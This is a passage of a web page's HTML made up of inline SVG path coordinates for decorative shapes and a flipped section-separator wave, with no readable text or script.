d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n </svg>\n </div>\n <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2